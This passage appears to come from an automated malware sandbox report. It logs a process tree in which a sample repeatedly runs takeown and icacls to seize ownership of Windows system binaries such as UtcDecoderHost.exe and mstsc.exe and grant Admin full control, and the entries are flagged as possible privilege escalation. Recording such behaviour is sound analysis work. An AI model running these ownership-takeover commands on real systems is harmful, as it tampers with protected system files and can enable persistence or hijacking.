- Suspicious use of AdjustPrivilegeToken
PID:2956
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4504
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2784
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2280
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:2056
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1260
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:4060
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1556
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:60
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5092
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:1280
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1348
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:4468
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3292
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:3120
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4988
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:1736
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:512
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:2004
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3892
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:3644
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4608
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3156
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2808
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:1132
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1012
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:1948
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4512
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:744
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2696
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:2056
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4792
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3200
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3984
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3204
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1556
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:4276
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3624
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:840
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4640
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:3812 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1280
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1432
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3360
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:208
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3236
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3760
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:4232
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3824
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5092
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:904
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:3540
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1608
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3536
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4240
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5212
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5260
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5300
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5380
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5444
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5476
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5524
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5588
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5632
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5660
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5712
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5724
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5792
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5816
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5884
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5904
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5920
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5972
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5980
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5996
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:6004
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6064
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:6092
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3176
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3600
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4508
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:1624
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2632
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:4628
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2164
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:2804
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3708
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3476
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:2828
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3044
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5284
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:264
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:2080
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4832
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:3076
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5016
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3496
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5580
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:3552
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2248
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5960
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:3864
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5184
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6108
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5912
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5188
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5328
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5396
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:5736
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1144
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5432
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5880
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5464
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:5716
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5060
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5424
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:468
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2396
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:1484
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5888
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5700
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6060
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:2484
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:4484
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5384
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5476
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1608
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1432
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5996 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1556
-
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:4792
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5660
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6092
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5940
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:6120
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5536
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:6124
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5160
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5820
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4832
-
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:1160
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1084
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:4508
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:4312
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:2512
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1512
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Modifies file permissions
PID:5196
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:5132
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵
- Possible privilege escalation attempt
PID:3560
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:5580
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"2⤵PID:5148
-
-
